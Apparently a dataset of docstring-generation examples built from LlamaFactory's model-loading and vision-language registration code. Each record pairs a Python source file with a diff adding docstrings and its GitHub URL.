lora_conflict_keys=["timm_model", "subsample_conv_projection"],
)
# copied from qwen2vl
_register_composite_model(
model_type="glm4v",
projector_key="visual.merger",
vision_model_keys=["visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="glm4v_moe",
projector_key="visual.merger",
vision_model_keys=["visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="glm_ocr",
projector_key="visual.merger",
vision_model_keys=["visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="internvl",
)
_register_composite_model(
model_type="interns1",
)
_register_composite_model(
model_type="Keye",
projector_key="mlp_AR",
vision_model_keys=["visual.vision_model.patch_embedding", "visual.vision_model.encoder"],
language_model_keys=["model", "lm_head"],
lora_conflict_keys=["patch_embedding"],
)
_register_composite_model(
model_type="kimi_vl",
)
_register_composite_model(
model_type="llama4",
vision_model_keys=["vision_model"],
)
_register_composite_model(
model_type="llava",
)
_register_composite_model(
model_type="llava_next",
)
_register_composite_model(
model_type="llava_next_video",
)
_register_composite_model(
model_type="minicpmv",
projector_key="resampler",
vision_model_keys=["vpm"],
language_model_keys=["llm"],
)
_register_composite_model(
model_type="minicpmo",
projector_key="resampler",
vision_model_keys=["vpm", "apm", "audio_avg_pooler", "audio_projection_layer", "tts"],
language_model_keys=["llm"],
lora_conflict_keys=["audio_projection_layer"],
)
_register_composite_model(
model_type="mistral3",
projector_key="model.multi_modal_projector",
)
_register_composite_model(
model_type="mllama",
vision_model_keys=["vision_model"],
)
_register_composite_model(
model_type="paligemma",
)
_register_composite_model(
model_type="qwen2_audio",
vision_model_keys=["audio_tower"],
)
_register_composite_model(
model_type="qwen2_5_omni_thinker",
projector_key="visual.merger",
vision_model_keys=["visual.patch_embed", "visual.blocks", "audio_tower"],
language_model_keys=["model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen2_vl",
projector_key="visual.merger",
vision_model_keys=["visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"]
if is_transformers_version_greater_than("4.52.0")
else ["model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen2_5_vl",
projector_key="visual.merger",
vision_model_keys=["visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"]
if is_transformers_version_greater_than("4.52.0")
else ["model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen3_vl",
projector_key="visual.merger",
vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks", "visual.deepstack_merger_list"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen3_vl_moe",
projector_key="visual.merger",
vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks", "visual.deepstack_merger_list"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen3_omni_moe_thinker",
projector_key="visual.merger",
vision_model_keys=[
"visual.pos_embed",
"visual.patch_embed",
"visual.blocks",
"visual.deepstack_merger_list",
"audio_tower",
],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen3_5",
projector_key="model.visual.merger",
vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="qwen3_5_moe",
projector_key="model.visual.merger",
vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks"],
language_model_keys=["language_model", "lm_head"],
lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="video_llava",
) | --- +++ @@ -62,6 +62,16 @@ language_model_keys: Optional[list[str]] = None,
lora_conflict_keys: Optional[list[str]] = None,
):
+ r"""Register a new composite model.
+
+ Args:
+ model_type: model type
+ projector_key: multi_modal_projector
+ vision_model_keys: vision_tower
+ language_model_keys: language_model
+ lora_conflict_keys: None
+
+ """
COMPOSITE_MODELS[model_type] = CompositeModel(
model_type=model_type,
projector_key=projector_key or "multi_modal_projector",
@@ -117,6 +127,7 @@
def autocast_projector_dtype(model: "PreTrainedModel", model_args: "ModelArguments") -> None:
+ r"""Cast projector output to half precision for fine-tuning quantized VLMs."""
def _mm_projector_forward_post_hook(
module: "torch.nn.Module", args: tuple["torch.Tensor"], output: "torch.Tensor"
@@ -135,6 +146,7 @@
def configure_visual_model(config: "PretrainedConfig") -> None:
+ r"""Patch VLMs before loading them."""
if getattr(config, "text_config", None) and not getattr(config, "hidden_size", None):
# required for ds zero3 and valuehead models
setattr(config, "hidden_size", getattr(config.text_config, "hidden_size", None))
@@ -145,6 +157,7 @@
def get_forbidden_modules(config: "PretrainedConfig", finetuning_args: "FinetuningArguments") -> set[str]:
+ r"""Freeze vision tower and language model for VLM full/freeze tuning."""
model_type = getattr(config, "model_type", None)
forbidden_modules = set()
if model_type in COMPOSITE_MODELS:
@@ -169,6 +182,7 @@ def patch_target_modules(
model: "PreTrainedModel", finetuning_args: "FinetuningArguments", target_modules: list[str]
) -> list[str]:
+ r"""Freeze vision tower for VLM LoRA tuning."""
model_type = getattr(model.config, "model_type", None)
if model_type in COMPOSITE_MODELS:
forbidden_modules = get_forbidden_modules(model.config, finetuning_args)
@@ -401,4 +415,4 @@
_register_composite_model(
model_type="video_llava",
-)+)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/model/model_utils/visual.py |
Generate docstrings for exported functions | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import TYPE_CHECKING, Any, Optional, TypedDict
import torch
from transformers import (
AutoConfig,
AutoModelForCausalLM,
AutoModelForImageTextToText,
AutoModelForSeq2SeqLM,
AutoModelForTextToWaveform,
AutoProcessor,
AutoTokenizer,
)
from trl import AutoModelForCausalLMWithValueHead
from ..extras import logging
from ..extras.misc import count_parameters, skip_check_imports, try_download_model_from_other_hub
from ..extras.packages import is_torch_version_greater_than
from .adapter import init_adapter
from .model_utils.ktransformers import load_kt_pretrained_model
from .model_utils.liger_kernel import apply_liger_kernel
from .model_utils.misc import register_autoclass
from .model_utils.mod import convert_pretrained_model_to_mod, load_mod_pretrained_model
from .model_utils.unsloth import load_unsloth_pretrained_model
from .model_utils.valuehead import load_valuehead_params
from .patcher import patch_config, patch_model, patch_processor, patch_tokenizer, patch_valuehead_model
if TYPE_CHECKING:
from transformers import PretrainedConfig, PreTrainedModel, PreTrainedTokenizer, ProcessorMixin
from ..hparams import FinetuningArguments, ModelArguments
logger = logging.get_logger(__name__)
class TokenizerModule(TypedDict):
tokenizer: "PreTrainedTokenizer"
processor: Optional["ProcessorMixin"]
def _get_init_kwargs(model_args: "ModelArguments") -> dict[str, Any]:
skip_check_imports()
model_args.model_name_or_path = try_download_model_from_other_hub(model_args)
return {
"trust_remote_code": model_args.trust_remote_code,
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"token": model_args.hf_hub_token,
}
def load_tokenizer(model_args: "ModelArguments") -> "TokenizerModule":
init_kwargs = _get_init_kwargs(model_args)
try:
tokenizer = AutoTokenizer.from_pretrained(
model_args.model_name_or_path,
use_fast=model_args.use_fast_tokenizer,
split_special_tokens=model_args.split_special_tokens,
padding_side="right",
**init_kwargs,
)
except ValueError: # try another one
tokenizer = AutoTokenizer.from_pretrained(
model_args.model_name_or_path,
use_fast=not model_args.use_fast_tokenizer,
padding_side="right",
**init_kwargs,
)
except Exception as e:
raise OSError("Failed to load tokenizer.") from e
patch_tokenizer(tokenizer, model_args)
try:
processor = AutoProcessor.from_pretrained(
model_args.model_name_or_path,
use_fast=model_args.use_fast_tokenizer,
**init_kwargs,
)
except ValueError: # try another one
processor = AutoProcessor.from_pretrained(
model_args.model_name_or_path,
use_fast=not model_args.use_fast_tokenizer,
**init_kwargs,
)
except Exception as e:
logger.info_rank0(f"Failed to load processor: {e}.")
processor = None
# Avoid load tokenizer, see:
# https://github.com/huggingface/transformers/blob/v4.40.0/src/transformers/models/auto/processing_auto.py#L324
if processor is not None and "Processor" not in processor.__class__.__name__:
logger.debug("The loaded processor is not an instance of Processor. Dropping it.")
processor = None
if processor is not None:
patch_processor(processor, tokenizer, model_args)
return {"tokenizer": tokenizer, "processor": processor}
def load_config(model_args: "ModelArguments") -> "PretrainedConfig":
init_kwargs = _get_init_kwargs(model_args)
return AutoConfig.from_pretrained(model_args.model_name_or_path, **init_kwargs)
def load_model(
tokenizer: "PreTrainedTokenizer",
model_args: "ModelArguments",
finetuning_args: "FinetuningArguments",
is_trainable: bool = False,
add_valuehead: bool = False,
) -> "PreTrainedModel":
init_kwargs = _get_init_kwargs(model_args)
config = load_config(model_args)
patch_config(config, tokenizer, model_args, init_kwargs, is_trainable)
apply_liger_kernel(config, model_args, is_trainable, require_logits=(finetuning_args.stage not in ["pt", "sft"]))
model = None
lazy_load = False
if model_args.use_kt:
from ktransformers.sft.monkey_patch_torch_module import install_patch
install_patch()
model = load_kt_pretrained_model(config, model_args)
elif model_args.use_unsloth:
if model_args.adapter_name_or_path is not None:
lazy_load = True
elif is_trainable:
model = load_unsloth_pretrained_model(config, model_args, finetuning_args)
if model is None and not lazy_load:
init_kwargs["config"] = config
init_kwargs["pretrained_model_name_or_path"] = model_args.model_name_or_path
init_kwargs["torch_dtype"] = "auto"
if model_args.mixture_of_depths == "load":
model = load_mod_pretrained_model(**init_kwargs)
else:
if type(config) in AutoModelForImageTextToText._model_mapping.keys(): # image-text
load_class = AutoModelForImageTextToText
elif type(config) in AutoModelForSeq2SeqLM._model_mapping.keys(): # audio-text
load_class = AutoModelForSeq2SeqLM
elif type(config) in AutoModelForTextToWaveform._model_mapping.keys(): # audio-text for qwen omni
load_class = AutoModelForTextToWaveform
else:
load_class = AutoModelForCausalLM
if model_args.train_from_scratch:
model = load_class.from_config(config, trust_remote_code=model_args.trust_remote_code)
else:
model = load_class.from_pretrained(**init_kwargs)
if getattr(model.config, "model_type", None) in ["qwen2_5_omni", "qwen3_omni_moe"]:
model = getattr(model, "thinker")
if model_args.mixture_of_depths == "convert":
model = convert_pretrained_model_to_mod(model, config, model_args)
if not lazy_load:
patch_model(model, tokenizer, model_args, is_trainable, add_valuehead)
register_autoclass(config, model, tokenizer)
model = init_adapter(config, model, model_args, finetuning_args, is_trainable)
if add_valuehead:
model = AutoModelForCausalLMWithValueHead.from_pretrained(model)
patch_valuehead_model(model)
if model_args.adapter_name_or_path is not None:
vhead_path = model_args.adapter_name_or_path[-1]
else:
vhead_path = model_args.model_name_or_path
vhead_params = load_valuehead_params(vhead_path, model_args)
if vhead_params is not None:
model.load_state_dict(vhead_params, strict=False)
logger.info_rank0(f"Loaded valuehead from checkpoint: {vhead_path}")
# Conv3D is not recommended when using torch 2.9.x
if is_torch_version_greater_than("2.9.0") and not is_torch_version_greater_than("2.10.0"):
if any(isinstance(m, torch.nn.Conv3d) for m in model.modules()):
raise ValueError(
"Unsupported torch version detected: torch 2.9.x with Conv3D. "
"This combination is known to cause severe performance regression. "
"Please downgrade torch to <2.9 or remove Conv3D. "
"See https://github.com/pytorch/pytorch/issues/166122"
)
if not is_trainable:
model.requires_grad_(False)
model.eval()
else:
model.train()
# Borrowing the kernel plugins ability of v1 to temporarily apply the NPU fusion operator to v0,
# it is turned off by default, and can be discarded after the transition period ends.
if model_args.use_v1_kernels and is_trainable:
logger.warning_rank0(
"You are try to using future feature about kernels, please note that this feature "
"is not supported for all models. If get any error, please disable this feature, or report the issue."
)
from ..v1.plugins.model_plugins.kernels.interface import apply_default_kernels
model = apply_default_kernels(model, include_kernels=model_args.use_v1_kernels)
trainable_params, all_param = count_parameters(model)
if is_trainable:
param_stats = (
f"trainable params: {trainable_params:,} || "
f"all params: {all_param:,} || trainable%: {100 * trainable_params / all_param:.4f}"
)
else:
param_stats = f"all params: {all_param:,}"
logger.info_rank0(param_stats)
if model_args.print_param_status and int(os.getenv("LOCAL_RANK", "0")) == 0:
for name, param in model.named_parameters():
print(f"name: {name}, dtype: {param.dtype}, device: {param.device}, trainable: {param.requires_grad}")
return model | --- +++ @@ -55,6 +55,10 @@
def _get_init_kwargs(model_args: "ModelArguments") -> dict[str, Any]:
+ r"""Get arguments to load config/tokenizer/model.
+
+ Note: including inplace operation of model_args.
+ """
skip_check_imports()
model_args.model_name_or_path = try_download_model_from_other_hub(model_args)
return {
@@ -66,6 +70,10 @@
def load_tokenizer(model_args: "ModelArguments") -> "TokenizerModule":
+ r"""Load pretrained tokenizer and optionally loads processor.
+
+ Note: including inplace operation of model_args.
+ """
init_kwargs = _get_init_kwargs(model_args)
try:
tokenizer = AutoTokenizer.from_pretrained(
@@ -116,6 +124,7 @@
def load_config(model_args: "ModelArguments") -> "PretrainedConfig":
+ r"""Load model config."""
init_kwargs = _get_init_kwargs(model_args)
return AutoConfig.from_pretrained(model_args.model_name_or_path, **init_kwargs)
@@ -127,6 +136,7 @@ is_trainable: bool = False,
add_valuehead: bool = False,
) -> "PreTrainedModel":
+ r"""Load pretrained model."""
init_kwargs = _get_init_kwargs(model_args)
config = load_config(model_args)
patch_config(config, tokenizer, model_args, init_kwargs, is_trainable)
@@ -234,4 +244,4 @@ for name, param in model.named_parameters():
print(f"name: {name}, dtype: {param.dtype}, device: {param.device}, trainable: {param.requires_grad}")
- return model+ return model
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/model/loader.py |
Add docstrings that explain logic | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...extras import logging
from .visual import COMPOSITE_MODELS
if TYPE_CHECKING:
from transformers import PretrainedConfig, PreTrainedModel, PreTrainedTokenizer
logger = logging.get_logger(__name__)
def find_all_linear_modules(model: "PreTrainedModel", freeze_vision_tower: bool) -> list[str]:
model_type = getattr(model.config, "model_type", None)
forbidden_modules = {"lm_head"}
if model_type == "chatglm":
forbidden_modules.add("output_layer")
elif model_type == "internlm2":
forbidden_modules.add("output")
if model_type in COMPOSITE_MODELS:
forbidden_modules.add(COMPOSITE_MODELS[model_type].projector_key)
if freeze_vision_tower and model_type in COMPOSITE_MODELS:
forbidden_modules.update(COMPOSITE_MODELS[model_type].vision_model_keys)
module_names = set()
for name, module in model.named_modules():
if any(forbidden_module in name for forbidden_module in forbidden_modules):
continue
if "Linear" in module.__class__.__name__ and "Embedding" not in module.__class__.__name__:
module_names.add(name.split(".")[-1])
logger.info_rank0("Found linear modules: {}".format(",".join(module_names)))
return list(module_names)
def find_expanded_modules(model: "PreTrainedModel", target_modules: list[str], num_layer_trainable: int) -> list[str]:
num_layers = getattr(model.config, "num_hidden_layers", None)
if not num_layers:
raise ValueError("Model was not supported.")
if num_layers % num_layer_trainable != 0:
raise ValueError(
f"`num_layers` {num_layers} should be divisible by `num_layer_trainable` {num_layer_trainable}."
)
stride = num_layers // num_layer_trainable
trainable_layer_ids = range(stride - 1, num_layers + stride - 1, stride)
trainable_layers = [f".{idx:d}." for idx in trainable_layer_ids]
module_names = []
for name, _ in model.named_modules():
if any(target_module in name for target_module in target_modules) and any(
trainable_layer in name for trainable_layer in trainable_layers
):
module_names.append(name)
logger.info_rank0("Apply lora to layers: {}.".format(",".join(map(str, trainable_layer_ids))))
return module_names
def register_autoclass(config: "PretrainedConfig", model: "PreTrainedModel", tokenizer: "PreTrainedTokenizer"):
if "AutoConfig" in getattr(config, "auto_map", {}):
config.__class__.register_for_auto_class()
if "AutoModelForCausalLM" in getattr(config, "auto_map", {}):
model.__class__.register_for_auto_class()
if "AutoTokenizer" in tokenizer.init_kwargs.get("auto_map", {}):
tokenizer.__class__.register_for_auto_class() | --- +++ @@ -26,6 +26,7 @@
def find_all_linear_modules(model: "PreTrainedModel", freeze_vision_tower: bool) -> list[str]:
+ r"""Find all available modules to apply LoRA, GaLore or APOLLO."""
model_type = getattr(model.config, "model_type", None)
forbidden_modules = {"lm_head"}
if model_type == "chatglm":
@@ -52,6 +53,7 @@
def find_expanded_modules(model: "PreTrainedModel", target_modules: list[str], num_layer_trainable: int) -> list[str]:
+ r"""Find the modules in the expanded blocks to apply lora."""
num_layers = getattr(model.config, "num_hidden_layers", None)
if not num_layers:
raise ValueError("Model was not supported.")
@@ -81,4 +83,4 @@ if "AutoModelForCausalLM" in getattr(config, "auto_map", {}):
model.__class__.register_for_auto_class()
if "AutoTokenizer" in tokenizer.init_kwargs.get("auto_map", {}):
- tokenizer.__class__.register_for_auto_class()+ tokenizer.__class__.register_for_auto_class()
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/model/model_utils/misc.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.